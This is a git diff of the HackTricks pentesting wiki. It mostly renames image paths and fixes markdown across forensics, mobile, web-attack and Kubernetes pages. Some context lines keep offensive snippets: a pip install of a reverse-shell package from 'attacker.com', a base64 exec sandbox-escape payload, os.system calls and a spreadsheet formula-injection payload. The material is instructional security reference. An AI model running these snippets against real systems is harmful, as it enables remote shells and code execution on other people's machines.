In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
|
||||
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2) (2).png>)
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (2).png>)
|
||||
|
||||
An then use the following code
|
||||
|
||||
|
|
|
@ -134,7 +134,7 @@ Some interesting attributes:
|
|||
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others):
|
||||
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
|
||||
|
||||
![](<../../../.gitbook/assets/image (507) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (507) (1) (1).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (509).png>)
|
||||
|
||||
|
|
|
@ -60,7 +60,7 @@ This tool is also useful to get **other information analysed** from the packets
|
|||
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
|
||||
This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (567) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (567) (1).png>)
|
||||
|
||||
### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
|
||||
|
|
|
@ -83,7 +83,7 @@ You can add a column that show the Host HTTP header:
|
|||
|
||||
And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
|
||||
|
||||
![](<../../../.gitbook/assets/image (408) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (408).png>)
|
||||
|
||||
## Identifying local hostnames
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
|
|||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
|
||||
|
||||
### Volume Shadow Copies
|
||||
|
||||
|
@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
|||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (3).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (3).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
|
|
|
@ -133,7 +133,7 @@ Within this registry it's possible to find:
|
|||
|
||||
![](<../../../.gitbook/assets/image (477).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (479) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (479) (1).png>)
|
||||
|
||||
Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value
|
||||
|
||||
|
@ -153,7 +153,7 @@ Having the **{GUID}** of the device it's now possible to **check all the NTUDER.
|
|||
|
||||
Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer).
|
||||
|
||||
![](<../../../.gitbook/assets/image (483) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (483) (1) (1).png>)
|
||||
|
||||
### Volume Serial Number
|
||||
|
||||
|
|
|
@ -941,7 +941,7 @@ int main(int argc,char* argv[] )
|
|||
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command:
|
||||
{% endhint %}
|
||||
|
||||
![](<../../.gitbook/assets/image (407) (2).png>)
|
||||
![](<../../.gitbook/assets/image (407) (1).png>)
|
||||
|
||||
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
|
||||
|
||||
|
|
|
@ -193,7 +193,7 @@ The offsets of any constructors are held in the **\_\_mod\_init\_func** section
|
|||
|
||||
The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.
|
||||
|
||||
![](<../../.gitbook/assets/image (555).png>)
|
||||
![](<../../.gitbook/assets/image (507) (3).png>)
|
||||
|
||||
#### Get the info
|
||||
|
||||
|
|
|
@ -108,7 +108,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi
|
|||
2. The JSON payload is encrypted using Absinthe (**`NACSign`**)
|
||||
3. All requests over HTTPs, built-in root certificates are used
|
||||
|
||||
![](<../../../.gitbook/assets/image (566) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (566).png>)
|
||||
|
||||
The response is a JSON dictionary with some important data like:
|
||||
|
||||
|
@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
|
|||
* Signed using the **device identity certificate (from APNS)**
|
||||
* **Certificate chain** includes expired **Apple iPhone Device CA**
|
||||
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
### Step 6: Profile Installation
|
||||
|
||||
|
|
|
@ -85,7 +85,7 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
|
|||
|
||||
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
|
||||
|
||||
{% file src="../../../.gitbook/assets/Reverse.tar.gz" %}
|
||||
{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
|
||||
|
||||
{% hint style="info" %}
|
||||
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
|
||||
|
@ -121,7 +121,7 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
|
|||
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
|
||||
* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
|
||||
|
||||
If you can access to the**`__builtins__`** object you can import libraries (notice that you could also use here other string representation showed in last section):
|
||||
If you can access to the\*\*`__builtins__`\*\* object you can import libraries (notice that you could also use here other string representation showed in last section):
|
||||
|
||||
```python
|
||||
__builtins__.__import__("os").system("ls")
|
||||
|
@ -499,7 +499,7 @@ You can check the output of this script in this page:
|
|||
If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.
|
||||
|
||||
{% hint style="info" %}
|
||||
However, there is a **limitation**, you can only use the symbols `.[]`, so you **won't be able to execute arbitrary code**, just to read information. \
|
||||
However, there is a **limitation**, you can only use the symbols `.[]`, so you **won't be able to execute arbitrary code**, just to read information.\
|
||||
_**If you know how to execute code through this vulnerability, please contact me.**_
|
||||
{% endhint %}
|
||||
|
||||
|
@ -751,6 +751,7 @@ First of all, we need to know **how to create and execute a code object** so we
|
|||
|
||||
```python
|
||||
code_type = type((lambda: None).__code__)
|
||||
# Check the following hint if you get an error in calling this
|
||||
code_obj = code_type(co_argcount, co_kwonlyargcount,
|
||||
co_nlocals, co_stacksize, co_flags,
|
||||
co_code, co_consts, co_names,
|
||||
|
@ -767,6 +768,16 @@ mydict['__builtins__'] = __builtins__
|
|||
function_type(code_obj, mydict, None, None, None)("secretcode")
|
||||
```
|
||||
|
||||
{% hint style="info" %}
|
||||
Depending on the python version the **parameters** of `code_type` may have a **different order**. The best way to know the order of the params in the python version you are running is to run:
|
||||
|
||||
```
|
||||
import types
|
||||
types.CodeType.__doc__
|
||||
'code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n flags, codestring, constants, names, varnames, filename, name,\n firstlineno, lnotab[, freevars[, cellvars]])\n\nCreate a code object. Not for the faint of heart.'
|
||||
```
|
||||
{% endhint %}
|
||||
|
||||
### Recreating a leaked function
|
||||
|
||||
{% hint style="warning" %}
|
||||
|
|
|
@ -3,14 +3,13 @@
|
|||
{% hint style="warning" %}
|
||||
**Support HackTricks and get benefits!**
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
|
||||
Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
{% endhint %}
|
||||
|
@ -28,7 +27,7 @@ It's highly recommended to start reading this page to know about the **most impo
|
|||
This is the main tool you need to connect to an android device (emulated or physical).\
|
||||
It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more.
|
||||
|
||||
Take a look to the following list of [**ADB Commands**](adb-commands.md) \_**\_to learn how to use adb.
|
||||
Take a look to the following list of [**ADB Commands**](adb-commands.md) \_\*\*\_to learn how to use adb.
|
||||
|
||||
## Smali
|
||||
|
||||
|
@ -307,7 +306,7 @@ Drozer is s useful tool to **exploit exported activities, exported services and
|
|||
### Exploiting exported Activities
|
||||
|
||||
[**Read this if you want to remind what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
|
||||
\_**\_Also remember that the code of an activity starts with the `onCreate` method.
|
||||
\_\*\*\_Also remember that the code of an activity starts with the `onCreate` method.
|
||||
|
||||
#### Authorisation bypass
|
||||
|
||||
|
@ -342,7 +341,7 @@ Content providers are basically used to **share data**. If an app has available
|
|||
### **Exploiting Services**
|
||||
|
||||
[**Read this if you want to remind what is a Service.**](android-applications-basics.md#services)\
|
||||
\_**\_Remember that a the actions of a Service start in the method `onStartCommand`.
|
||||
\_\*\*\_Remember that a the actions of a Service start in the method `onStartCommand`.
|
||||
|
||||
As service is basically something that **can receive data**, **process** it and **returns** (or not) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...\
|
||||
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services)
|
||||
|
@ -350,7 +349,7 @@ As service is basically something that **can receive data**, **process** it and
|
|||
### **Exploiting Broadcast Receivers**
|
||||
|
||||
[**Read this if you want to remind what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
|
||||
\_**\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`.
|
||||
\_\*\*\_Remember that a the actions of a Broadcast Receiver start in the method `onReceive`.
|
||||
|
||||
A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.\
|
||||
[**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers)
|
||||
|
@ -377,7 +376,7 @@ _Note that you can **omit the package name** and the mobile will automatically c
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (436) (1) (1).png>)
|
||||
|
||||
#### Sensitive info
|
||||
|
||||
|
@ -497,7 +496,7 @@ By default, it will also use some Frida Scripts to **bypass SSL pinning**, **roo
|
|||
MobSF can also **invoke exported activities**, grab **screenshots** of them and **save** them for the report.
|
||||
|
||||
To **start** the dynamic testing press the green bottom: "**Start Instrumentation**". Press the "**Frida Live Logs**" to see the logs generated by the Frida scripts and "**Live API Monitor**" to see all the invocation to hooked methods, arguments passed and returned values (this will appear after pressing "Start Instrumentation").\
|
||||
MobSF also allows you to load your own **Frida scripts (**to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**").
|
||||
MobSF also allows you to load your own \*\*Frida scripts (\*\*to send the results of your Friday scripts to MobSF use the function `send()`). It also has **several pre-written scripts** you can load (you can add more in `MobSF/DynamicAnalyzer/tools/frida_scripts/others/`), just **select them**, press "**Load**" and press "**Start Instrumentation**" (you will be able to see the logs of that scripts inside "**Frida Live Logs**").
|
||||
|
||||
![](<../../.gitbook/assets/image (215).png>)
|
||||
|
||||
|
|
|
@ -223,7 +223,7 @@ In this case you could try to abuse the functionality creating a web with the fo
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](<../../.gitbook/assets/image (436) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
|
||||
|
||||
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
|
||||
|
||||
|
|
|
@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
|
|||
|
||||
**Only for Windows.**
|
||||
|
||||
![](<../../.gitbook/assets/image (207) (1).png>)
|
||||
![](<../../.gitbook/assets/image (207) (1) (1).png>)
|
||||
|
||||
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
|
||||
|
||||
|
|
|
@ -210,7 +210,7 @@ However there are **a lot of different command line useful options** that you ca
|
|||
|
||||
First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_
|
||||
|
||||
![](<../../.gitbook/assets/image (367) (1).png>)
|
||||
![](<../../.gitbook/assets/image (367).png>)
|
||||
|
||||
**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\
|
||||
For example you can run it like:
|
||||
|
|
|
@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
|
|||
|
||||
You should also check the **ContentProvider code** to search for queries:
|
||||
|
||||
![](<../../../.gitbook/assets/image (121) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>)
|
||||
|
||||
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
|
||||
|
||||
|
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
|
|||
|
||||
![](<../../../.gitbook/assets/image (187).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
Because you will be able to call them
|
||||
|
||||
|
|
|
@ -711,7 +711,7 @@ You can collect console logs through the Xcode **Devices** window as follows:
|
|||
5. Reproduce the problem.
|
||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||
|
||||
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (2) (5).png>)
|
||||
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (5).png>)
|
||||
|
||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@ description: >-
|
|||
|
||||
# Pentesting Methodology
|
||||
|
||||
![](<.gitbook/assets/p2 (1).png>)
|
||||
![](.gitbook/assets/p2.png)
|
||||
|
||||
{% hint style="warning" %}
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
|
|
@ -25,7 +25,7 @@ Several **counter-measures** could be in place to avoid this vulnerability.
|
|||
|
||||
### CSRF map
|
||||
|
||||
![](<../.gitbook/assets/image (307) (1).png>)
|
||||
![](<../.gitbook/assets/image (112).png>)
|
||||
|
||||
## Defences Bypass
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ The following properties or combination of properties apply to ViewState informa
|
|||
|
||||
## **Test Cases**
|
||||
|
||||
![](<../../.gitbook/assets/image (309).png>)
|
||||
![](<../../.gitbook/assets/image (309) (1).png>)
|
||||
|
||||
### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false
|
||||
|
||||
|
|
|
@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
|
|||
|
||||
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.
|
||||
|
||||
![](<../../.gitbook/assets/intruder4 (1) (1).gif>)
|
||||
![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
|
||||
|
||||
### More Information
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
First of all, we need to understand `Object`in JavaScript. An object is simply a collection of key and value pairs, often called properties of that object. For example:
|
||||
|
||||
![](<../../../.gitbook/assets/image (356).png>)
|
||||
![](<../../../.gitbook/assets/image (389) (1).png>)
|
||||
|
||||
In Javascript, `Object`is a basic object, the template for all newly created objects. It is possible to create an empty object by passing `null`to `Object.create`. However, the newly created object will also have a type that corresponds to the passed parameter and inherits all the basic properties.
|
||||
|
||||
|
|
|
@ -41,7 +41,7 @@ The good news is that **this payload is executed automatically when the file is
|
|||
|
||||
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
|
||||
|
||||
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
### More
|
||||
|
||||
|
|
|
@ -500,7 +500,7 @@ def handleResponse(req, interesting):
|
|||
|
||||
## More info
|
||||
|
||||
![](../../.gitbook/assets/eki5edauuaaipik.jpg)
|
||||
![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
|
||||
|
||||
[Image from here.](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)
|
||||
|
||||
|
|
|
@ -52,7 +52,7 @@ Note that if you put just the new line characters sending a header without conte
|
|||
|
||||
In this case the injection was performed inside the request line:
|
||||
|
||||
![](<../../.gitbook/assets/image (645) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (640) (1).png>)
|
||||
|
||||
### URL Prefix Injection
|
||||
|
||||
|
|
|
@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
|
|||
|
||||
This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
|
||||
|
||||
![](<../.gitbook/assets/image (630) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (643) (1) (1).png>)
|
||||
|
||||
### Response Splitting
|
||||
|
||||
|
|
|
@ -69,7 +69,7 @@ In order to **find event listeners** in the current page you can:
|
|||
* **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
|
||||
* **Execute** in the developer tools console: `getEventListeners(window)`
|
||||
|
||||
![](<../.gitbook/assets/image (618) (1).png>)
|
||||
![](<../.gitbook/assets/image (618) (1) (1).png>)
|
||||
|
||||
* **Go to** _Elements --> Event Listeners_ in the developer tools of the browser
|
||||
|
||||
|
|
|
@ -87,5 +87,5 @@ Regexp (a+)*$ took 723 milliseconds.
|
|||
|
||||
## Tools
|
||||
|
||||
{% embed url="https://github.com/doyensec/regexploit" %}
|
||||
|
||||
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
|
||||
* [https://devina.io/redos-checker](https://devina.io/redos-checker)
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
|
||||
## Attacks Graphic
|
||||
|
||||
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (2) (3).png>)
|
||||
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (3).png>)
|
||||
|
||||
## Tool
|
||||
|
||||
|
|
|
@ -72,11 +72,11 @@ Then, a malicious user could insert a different Unicode character equivalent to
|
|||
|
||||
You could use one of the following characters to trick the webapp and exploit a XSS:
|
||||
|
||||
![](<../.gitbook/assets/image (312).png>)
|
||||
![](<../.gitbook/assets/image (312) (1).png>)
|
||||
|
||||
Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
|
||||
|
||||
![](<../.gitbook/assets/image (215) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (215) (1).png>)
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -91,7 +91,7 @@ Some **examples**:
|
|||
|
||||
## WAF bypass encoding image
|
||||
|
||||
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg)
|
||||
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
|
||||
|
||||
## Injecting inside raw HTML
|
||||
|
||||
|
|
|
@ -19,7 +19,7 @@ Then, in "Dev Tools" --> "Sources" **select the file** you want to override and
|
|||
|
||||
This will **copy the JS file locally** and you will be able to **modify that copy in the browser**. So just add the **`debugger;`** command wherever you want, **save** the change and **reload** the page, and every-time you access that web page **your local JS copy is going to be loaded** and your debugger command maintained in its place:
|
||||
|
||||
![](<../../.gitbook/assets/image (642).png>)
|
||||
![](<../../.gitbook/assets/image (648).png>)
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -83,7 +83,7 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not
|
|||
|
||||
Mongo Object IDs are **12-byte hexadecimal** strings:
|
||||
|
||||
![](../.gitbook/assets/id-and-ObjectIds-in-MongoDB.png)
|
||||
![](../.gitbook/assets/id-and-objectids-in-mongodb.png)
|
||||
|
||||
For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019
|
||||
|
||||
|
|
|
@ -124,7 +124,7 @@ Once administrative access to the BMC is obtained, there are a number of methods
|
|||
|
||||
![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png)
|
||||
|
||||
![](<../.gitbook/assets/image (202) (2).png>)
|
||||
![](<../.gitbook/assets/image (202) (1).png>)
|
||||
|
||||
## Exploiting the BMC from the Host
|
||||
|
||||
|
|
|
@ -22,7 +22,7 @@
|
|||
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\
|
||||
When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
|
||||
|
||||
![](<../../.gitbook/assets/image (467) (1).png>)
|
||||
![](<../../.gitbook/assets/image (467).png>)
|
||||
|
||||
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes.
|
||||
* **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
|
||||
|
@ -163,7 +163,7 @@ http://127.0.0.1:50034/api/v1/namespaces/kubernetes-dashboard/services/http:kube
|
|||
Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\
|
||||
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
|
||||
|
||||
![](<../../.gitbook/assets/image (458) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (458) (1) (1) (1).png>)
|
||||
|
||||
#### Example of Deployment + Service declared in the same configuration file (from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml))
|
||||
|
||||
|
@ -369,7 +369,7 @@ helm search <keyword>
|
|||
|
||||
Helm is also a template engine that allows to generate config files with variables:
|
||||
|
||||
![](<../../.gitbook/assets/image (462).png>)
|
||||
![](<../../.gitbook/assets/image (465) (1).png>)
|
||||
|
||||
## Kubernetes secrets
|
||||
|
||||
|
|
|
@ -123,7 +123,7 @@ Responder is going to **impersonate all the service using the mentioned protocol
|
|||
|
||||
It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
|
||||
|
||||
![](<../../.gitbook/assets/poison (1) (1).jpg>)
|
||||
![](<../../.gitbook/assets/poison (1) (1) (1).jpg>)
|
||||
|
||||
## Inveigh
|
||||
|
||||
|
@ -161,7 +161,7 @@ If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and ex
|
|||
python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/image (209) (1).png>)
|
||||
![](<../../.gitbook/assets/image (209).png>)
|
||||
|
||||
### Post-Exploitation (MultiRelay)
|
||||
|
||||
|
@ -191,7 +191,7 @@ To disable LLMNR in your domain for DNS clients, open gpedit.msc.\
|
|||
Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\
|
||||
Locate the option “Turn off multicast name resolution” and click “policy setting”:
|
||||
|
||||
![](<../../.gitbook/assets/1 (1).jpg>)
|
||||
![](../../.gitbook/assets/1.jpg)
|
||||
|
||||
Once the new window opens, enable this option, press Apply and click OK:
|
||||
|
||||
|
|
|
@ -19,7 +19,7 @@ Scalar objects define a single object instance whereas tabular objects define mu
|
|||
**OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\
|
||||
**Vendors define private branches including managed objects for their own products.**
|
||||
|
||||
![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png)
|
||||
![](../../.gitbook/assets/SNMP\_OID\_MIB\_Tree.png)
|
||||
|
||||
You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
|
||||
There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...)
|
||||
|
|
|
@ -24,7 +24,7 @@ Accessing _/user/\<number>_ you can see the number of existing users, in this ca
|
|||
|
||||
![](<../../.gitbook/assets/image (257).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (227) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (227) (1) (1) (1).png>)
|
||||
|
||||
## Hidden pages enumeration
|
||||
|
||||
|
@ -49,7 +49,7 @@ You need the **plugin php to be installed** (check it accessing to _/modules/php
|
|||
|
||||
Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
|
||||
|
||||
![](<../../.gitbook/assets/image (247) (1).png>)
|
||||
![](<../../.gitbook/assets/image (252).png>)
|
||||
|
||||
Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
|
||||
|
||||
|
|
|
@ -68,11 +68,11 @@ Now that we know which kind of information is saved inside the database, let's t
|
|||
|
||||
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
|
||||
|
||||
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
